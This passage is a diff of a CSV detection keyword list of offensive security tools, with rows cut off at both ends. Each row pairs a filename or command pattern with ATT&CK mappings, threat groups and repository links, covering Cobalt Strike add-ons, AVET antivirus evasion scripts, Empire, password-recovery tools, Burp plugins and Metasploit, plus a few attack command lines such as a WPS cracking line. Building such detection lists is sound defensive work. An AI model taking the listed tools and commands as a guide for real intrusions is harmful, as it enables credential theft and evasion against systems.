- T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ausecwa/bof-registry","1","1","N/A","10","10","17","7","2021-02-11T04:38:28Z","2021-01-29T05:07:47Z" "*build_40xshikata_revhttpsunstaged_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*build_50xshikata_quiet_revhttps_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" @@ -8053,20 +8200,20 @@ "*build_svc_20xshikata_bindtcp_win32.sh*","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1523","344","2023-03-24T16:50:08Z","2017-01-28T14:56:47Z" "*BuildBOFs.exe*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*BuildBOFs.sln*","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","23","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" -"*Building SYSTEM impersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Building SYSTEM impersonation*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*BulletsPassView.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView.zip*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_setup.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_x64.exe*","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bully wlan1mon -b * -c 9 -S -F -B -v 3*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*bunny.deb.parrot.sh/*","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*bupload_raw*.dll*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","173","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" -"*burnett_top_1024.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*bupload_raw*.dll*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*burnett_top_1024.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*Burp Suite*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burp*PayloadParser.py*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" "*burp*SQLMapper.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*burp.extension-payloadparser*","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","3","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" -"*burp_log_*.log*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burp_log_*.log*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*Burp_start.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*Burp_start_en.bat*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp2malleable.*","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","320","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" @@ -8074,10 +8221,10 @@ "*BurpCO2Suite.xml*","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","142","40","2019-12-24T22:30:15Z","2015-04-19T03:38:34Z" "*burpcollaborator.net*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpFunctions.java*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" -"*burpitem.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*burplog.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burpitem.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burplog.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*BurpShiroPassiveScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" -"*burpstate.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*burpstate.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "*Burpsuite*","offensive_tool_keyword","burpsuite","Burp Suite is a leading range of cybersecurity tools. brought to you by PortSwigger. We believe in giving our users a competitive advantage through superior research. This tool is not free and open source","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.exe*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burpsuite*.jar*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -8085,58 +8232,58 @@ "*burpsuite*.zip*","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BurpSuiteCn.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*BurpSuiteHTTPSmuggler*","offensive_tool_keyword","burpsuite","A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/nccgroup/BurpSuiteHTTPSmuggler","1","1","N/A","N/A","7","668","108","2019-05-04T06:15:42Z","2018-07-03T07:47:58Z" -"*BurpSuite-SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*BurpSuite-SecretFinder*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" "*burp-vulners-scanner-*.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp-xss-sql-plugin*","offensive_tool_keyword","burpsuite","find several bugbounty-worthy XSSes. OpenRedirects and SQLi.","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Network Exploitation tools","https://github.com/attackercan/burp-xss-sql-plugin","1","1","N/A","N/A","1","44","12","2016-09-28T21:46:18Z","2016-08-17T14:05:24Z" "*buster -e * -f john -l doe -b '****1989'*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*busterPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" +"*busterPayloads.txt*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" "*bWV0YXNwbG9pdA==*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is 